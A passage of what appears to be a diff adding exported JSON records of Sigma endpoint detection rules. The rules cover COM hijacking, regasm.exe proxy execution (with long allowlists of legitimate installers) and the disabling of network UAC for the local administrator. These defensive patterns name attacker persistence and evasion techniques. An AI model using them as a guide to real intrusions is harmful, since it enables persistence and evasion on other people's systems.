'HKLM\\SOFTWARE\\Classes\\CLSID\\{0997898B-0713-11D2-A4AA-00C04F8EEB3E}\\InprocServer32\\(Default)'\n filter_commonplaces:\n Details: '?:\\Windows\\System32\\windows.storage.dll'\n\n selection_identitystore:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{30d49246-d217-465f-b00b-ac9ddd652eb7}\\InprocServer32\\(Default)'\n filter_identitystore:\n Details: '?:\\Windows\\System32\\IDStore.dll'\n\n selection_unexpectedshutdownreason:\n TargetObject|endswith: '\\CLSID\\{68DDBB56-9D1D-4FD9-89C5-C0DA2A625392}\\InProcServer32\\(Default)'\n filter_unexpectedshutdownreason:\n Details: '%SystemRoot%\\system32\\stobject.dll'\n\n selection_printers:\n TargetObject|endswith: '\\CLSID\\{2227A280-3AEA-1069-A2DE-08002B30309D}\\InProcServer32\\(Default)'\n filter_printers:\n Details: '%SystemRoot%\\system32\\prnfldr.dll'\n\n condition: selection and (\n (selection_ehstorshell and not filter_ehstorshell) or\n (selection_wmiutils and not filter_wmiutils) or\n (selection_wmiprvsd and not filter_wmiprvsd) or\n (selection_wbemsvc and not filter_wbemsvc) or\n (selection_wbemprox and not filter_wbemprox) or\n (selection_applicationframe and not filter_applicationframe) or\n (selection_propsys and not filter_propsys) or\n (selection_actioncenter and not filter_actioncenter) or\n (selection_thumbcache and not filter_thumbcache) or\n (selection_syncreg and not filter_syncreg) or\n (selection_repdrvfs and not filter_repdrvfs) or\n (selection_psfactorybuffer and not filter_psfactorybuffer) or\n (selection_sharetaskscheduler and not filter_sharetaskscheduler) or\n (selection_sharingprivate and not filter_sharingprivate) or\n (selection_eventsystem and not filter_eventsystem) or\n (selection_msaa and not filter_msaa) or\n (selection_autoplay and not filter_autoplay) or\n (selection_notificationmanager and not filter_notificationmanager) or\n (selection_commonplaces and not filter_commonplaces) or\n (selection_identitystore and not filter_identitystore) or\n (selection_unexpectedshutdownreason and not filter_unexpectedshutdownreason) or\n (selection_printers and not filter_printers)\n )\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "032b28af-b4ce-4476-a201-8b2896158878",
+ "rule_name": "Possible Component Object Model Hijacking",
+ "rule_description": "Detects the possible hijacking of a Component Object Model (COM) in the registry.\nAttackers can use this method to achieve persistence through an event trigger execution.\nThe DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\nIt is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\n",
+ "rule_creation_date": "2022-09-29",
+ "rule_modified_date": "2026-02-02",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.execution",
+ "attack.persistence"
+ ],
+ "rule_technique_tags": [
+ "attack.t1546.015",
+ "attack.t1559.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "weak",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.080770Z",
+ "creation_date": "2026-03-23T11:45:34.080773Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.080777Z",
+ "rule_level": "medium",
+ "rule_confidence": "weak",
+ "rule_confidence_override": null,
+ "references": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
+ "https://attack.mitre.org/techniques/T1218/009/"
+ ],
+ "name": "t1218_009_regasm_dll_load.yml",
+ "content": "title: Suspicious Proxy Execution via regasm.exe\nid: 0363e1f9-7a85-414e-a37a-5ce7993e7db4\ndescription: |\n Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\n This may be used by attackers to load their .DLL files. By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\n AWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\n Application whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\n This can also be used by program installers in Windows.\n It is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\n - https://attack.mitre.org/techniques/T1218/009/\ndate: 2023/01/04\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.009\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Regasm\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\regasm.exe'\n OriginalFileName: 'regasm.exe'\n\n filter_directory:\n CommandLine|contains:\n - ' ?:\\Program Files\\'\n - ' ?:\\Program Files (x86)\\'\n - ' ?:\\PROGRA~2\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\'\n\n exclusion_pdf_creator:\n ParentCommandLine|contains: 'PDFCreator-*_*_*-setup.tmp'\n\n exclusion_installers:\n ParentImage|endswith: '\\MsiExec.exe'\n ParentCommandLine|contains:\n - '-Embedding'\n - '/V'\n - '-V'\n CommandLine|contains:\n # SOLIDWORKS 3D Modelling\n - '?:\\ProgramData\\SOLIDWORKS\\SOLIDWORKS CAM\\MATLIBx64\\ '\n # Microsoft CCM\n - 'Microsoft.ConfigurationManagement.SensorFramework.dll'\n - 'Microsoft.ConfigurationManager.SensorManagedProvider.dll'\n # Altova Script Editor\n - 'AltovaScriptFormEditorHost*.dll'\n # Oskab 3D\n - 'Oskab3D.SDB.dll'\n # MicroStrategy Office Plugin\n - '/tlb:moimain.tlb moimain.dll'\n - 'regasm.exe /nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\Tekla.Structures.Model\\\\*\\Tekla.Structures.Model.dll'\n - 'regasm.exe /nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\tekla.structures\\\\*\\tekla.structures.dll'\n - '?:\\programdata\\service advisor\\cal\\connectivity applications\\support\\regasm.exe*'\n - '?:\\program files\\bruker\\nanoscopeanalysis\\regasm.exe /s nanoscopeanalysis.exe /tlb:hostapplication.tlb'\n - '?:\\program files (x86)\\bl\\bl\\\\*\\\\*\\regasm.exe*'\n - '*\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\regasm.exe *\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\siga.softwareactivation.comwrapperspw.???'\n - '*\\regasm.exe /codebase *\\smsappl\\assemblies\\observationmetier.dll'\n - '?:\\users\\\\*\\temp\\is-*.tmp\\regasm.exe /s /* /tlb ?:\\users\\\\*\\temp\\is-*.tmp\\innosetuptools.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\intunecontentmanager\\microsoft.configurationmanager.intunecontentmanager.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.azuremanagement.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.cloudbase.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase bullzip.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase contextmenuhandler64.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase ie11cloudmetering.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase pdf7.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe ?:\\windows\\system32\\dolbyaposvc\\dax3apidll.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\contentstore\\base*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe datev.crystalreports.x64bridge.dll /tlb /nologo'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanagement.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsyncact.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\base\\\\*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe edisys.iulm.*.dll*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.agievision_pages.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.charmillestechnologymanager.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.optionsconfiguration.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threaddatabase.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threadlayer.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /register /s cgm.axilibraries.interop.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe */silent* *\\programs\\sap businessobjects\\epm add-in\\epmofficeactivex.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe stellarexcel.dll /tlb:com.stellarexcel.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /tlb /codebase robotconnectionaddin.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsprintdvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u contextmenuhandler64.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u ?:/program files/common files/wondershare/pdfelement??/preview/*/pepreview?.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\\\regasm.exe /unregister ?:/program files/atempo/tina/bin/libtina_comps_clr4.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\becpwin\\gfxgateway*.dll /regfile:*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coalaclient\\gatewaycs.dll /tlb:*\\coalaclient\\gatewaycs.tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\revao\\exe\\eic.global.interop.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\masslynx\\acquitywrapper.dll /silent /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase seedkey*.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\system32\\farpoint.spread8.excel2007.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\opentrust\\fncopentrust.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\allegoria\\classfncallegoria.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\converttopdf\\fiducial.notaire.compta.rao.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fiducialwrappermailboxplanete\\fiducial.wrappermailboxplanetecompta.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fnc_scan\\fnc_scan.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\ifiducial_fnc.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\wrapper_clotureaffaire.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm *\\ceniber\\autonet\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\diamic\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cashdrawer.dll /tlb:cls_cashdrawer.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cfd.dll /tlb:cls_cfd.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_depileuraures.dll /tlb:cls_depileuraures.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_print.dll /tlb:cls_print.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /silent *\\dedalus\\meds\\soins\\v7\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /tlb fiducial.rao.wordaddin.interop.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\batigestconnect\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\sage-paie\\declarations sociales\\client\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\b1crufl.dll /register /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\sagelcp.dll /s /nolog /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\fiducial.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\lexisnexis.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coloris\\activex\\interfacecoffrefort\\cosolucecoffrefortclient.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ecs2000.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\paie\\sagepaie\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo *\\salarior\\bus_bl\\pes\\bl.sante.interop.iparapheur.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose *?:\\windows\\syswow64\\dcsmmclib.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose *?:\\windows\\syswow64\\dcstraceconsole.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent ?:\\windows\\syswow64\\annoterpdf2.dll tlb ?:\\windows\\syswow64\\annoterpdf2.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent impac.mosaiq.charting.documents.mergefields.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe stange.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\\\regasm.exe stinterfaces.dll /codebase /tlb:?:\\program files (x86)\\philips\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\pacom.gms.extendedconfiguration.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.drive.drivetextserver.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.utilities.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /u *\\kansysedge\\rmp\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm fiducial.transim.comstarter.dll /codebase /tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm jdsu.fit.fiberchek.automation.dll /codebase'\n - '?:\\WINDOWS\\Microsoft.NET\\Framework*\\\\*\\regasm.exe /silent /codebase ?:\\ProgramData\\SOLIDWORKS\\\\*'\n\n exclusion_legitimate_grandparent:\n ProcessGrandparentCommandLine:\n # Ignore shares as they may often host legitimate installers\n - '\\\\\\\\*\\\\*'\n # SCCM\n - '?:\\Windows\\ccmcache\\\\*'\n # Legitimate apps\n - '?:\\Becpwin\\\\*'\n - '*\\Cosoluce\\bigjim\\Supernova.Client.BigJim.Service.exe'\n - '?:\\Windows\\Temp\\MW-????????-????-????-????-????????????\\setup_QBloc_*.exe'\n - '?:\\ProgramData\\Edisys\\SPIGAO\\iulm\\SPIGAOConnect_Setup-PROD.exe'\n\n exclusion_innosetuptools:\n CommandLine:\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n\n exclusion_lenovo:\n CommandLine:\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\ImController\\Plugins\\LenovoBatteryGaugePackage\\\\*\\PluginsContract.dll'\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\Vantage\\Addins\\LenovoBatteryGaugeAddin\\\\*\\PluginsContract.dll'\n\n exclusion_archimed_docmaker:\n ParentImage|endswith: '\\ArchimedDocMakerRegister.exe'\n CommandLine|contains: 'Achimed.DocMaker*.dll'\n\n exclusion_solu_qiq:\n ParentImage|endswith: '\\SOLU-QIQ Base *.*.*.exe'\n CommandLine|contains:\n - 'Convertisseur.dll'\n - 'ADAuthentication.dll'\n\n exclusion_wrapper_webview:\n ParentImage|endswith: 'WrapperWebView2.exe'\n ParentCommandLine|contains: '/ACTION=INSTALL'\n CommandLine|contains:\n - 'Microsoft.Web.WebView2.WinForms.tlb'\n - 'Microsoft.Web.WebView2.Core.tlb'\n\n exclusion_bat_emc:\n ParentImage|endswith: 'Setup_BAT-EMC_*.*.*.*.exe'\n CommandLine|contains:\n - 'VisuMonitoring.dll'\n - 'BatEmcBridge.dll'\n - 'SpectrogramActiveX.dll'\n\n exclusion_ivanti:\n ParentImage|endswith: '\\Ivanti20??-*\\Setup.exe'\n CommandLine|contains: 'Interop.ComUtilitiesLib.dll'\n\n exclusion_inot_office:\n ParentImage|endswith:\n - '\\GenApi.iNot.RegisterCOMComponants.exe'\n - '\\GenApi.CTI.Launcher.exe'\n CommandLine|contains:\n - '\\GenApi.iNot.Client.FramePlayer.DLL'\n - '\\GenApi.CTI.Data.iNot.dll'\n\n exclusion_fiducial:\n GrandparentImage|endswith:\n - '\\majfuposte.exe'\n - 'fncgf_evaluationprivilege.exe'\n ParentCommandLine|contains: '\\AppData\\Roaming\\fiducial\\compta\\'\n\n exclusion_water_ics:\n GrandparentImage|endswith: 'Waters\\ICS\\Companion\\ICSCompanionSvc.exe'\n ParentImage|endswith: 'Waters\\ICS\\Companion\\SetupHelper.exe'\n CommandLine|endswith: 'Waters.*.*.dll'\n\n exclusion_dolby:\n GrandparentImage|endswith: '\\DAX3API.EXE'\n ParentCommandLine|endswith: '\\DAX3APIDLL.dll'\n\n exclusion_mosaiq:\n GrandparentImage|endswith: '\\SetupMosaiq.tmp'\n ParentImage|endswith: '\\RegisterAssemblies.exe'\n\n exclusion_sage1:\n - GrandparentImage|endswith:\n - '\\Sagedirect.exe'\n - '\\SageDS_*_*_*.exe'\n - ParentCommandLine|contains:\n - '\\SageDS\\Client\\InstallShieldEnregistrementCOM.bat'\n - 'Sagedirect*.exe'\n exclusion_sage2:\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'SAGE SAS'\n\n exclusion_common_dlls:\n CommandLine|contains:\n - 'GenApi.iNot.*.*.dll'\n - 'GdPicture.NET.*.dll'\n\n exclusion_sap_se:\n ParentImage|endswith: '\\NwSapSetup.exe'\n CommandLine|contains:\n - 'sapnco.dll'\n - 'rscp4n.dll'\n\n exclusion_atempo:\n ParentImage: '?:\\Program Files\\Atempo\\TimeNavigator\\\\*\\Bin\\tina_*.exe'\n\n exclusion_philips:\n ParentImage:\n - '?:\\Program Files\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n - '?:\\Program Files (x86)\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n\n exclusion_sap:\n ParentImage|endswith: '\\setup\\NwSapSetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'SAP SE'\n\n exclusion_configuration_manager:\n ParentImage|endswith:\n - '\\srvboot.exe'\n - '\\cmupdate.exe'\n - '\\rolesetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_kansysedge:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\kansysedge\\installscripts\\utilities\\reregisterassemblies.bat'\n\n exclusion_genapi:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\genapi\\gupta\\i-not\\regasm_dlls.cmd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4",
+ "rule_name": "Suspicious Proxy Execution via regasm.exe",
+ "rule_description": "Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\nThis may be used by attackers to load their .DLL files. By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\nAWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\nApplication whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\nThis can also be used by program installers in Windows.\nIt is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\n",
+ "rule_creation_date": "2023-01-04",
+ "rule_modified_date": "2025-04-15",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1218.009"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "03983a13-d23e-4494-b3c5-9b24bf51acfc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.622015Z",
+ "creation_date": "2026-03-23T11:45:34.622017Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.622021Z",
+ "rule_level": "medium",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167",
+ "https://attack.mitre.org/techniques/T1112/"
+ ],
+ "name": "t1112_disable_filteradministratortoken.yml",
+ "content": "title: Network UAC Restrictions Disabled for Local Administrator\nid: 03983a13-d23e-4494-b3c5-9b24bf51acfc\ndescription: |\n Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\n By default this value is not set but adversaries may try to change it to circumvent a hardening policy.\n This will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using the local administrator account with full privileges.\n It is recommended to investigate any suspicious authentication using the local administrator account.\nreferences:\n - https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/12/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.lateral_movement\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\FilterAdministratorToken'\n Details|contains: '?WORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_local_security_policy:\n ProcessImage|endswith: '\\services.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_winoobe:\n ProcessGrandparentImage: '?:\\Windows\\System32\\setupugc.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\WINDOWS\\system32\\omadmclient.exe'\n\n exclusion_defender:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_logmein:\n ProcessImage: '?:\\Program Files (x86)\\LogMeIn\\x64\\LogMeIn.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "03983a13-d23e-4494-b3c5-9b24bf51acfc",
+ "rule_name": "Network UAC Restrictions Disabled for Local Administrator",
+ "rule_description": "Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\nBy default this value is not set but adversaries may try to change it to circumvent a hardening policy.\nThis will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using the local administrator account with full privileges.\nIt is recommended to investigate any suspicious authentication using the local administrator account.\n",
+ "rule_creation_date": "2023-12-27",
+ "rule_modified_date": "2026-03-16",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.lateral_movement"
+ ],
+ "rule_technique_tags": [
+ "attack.t1112"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
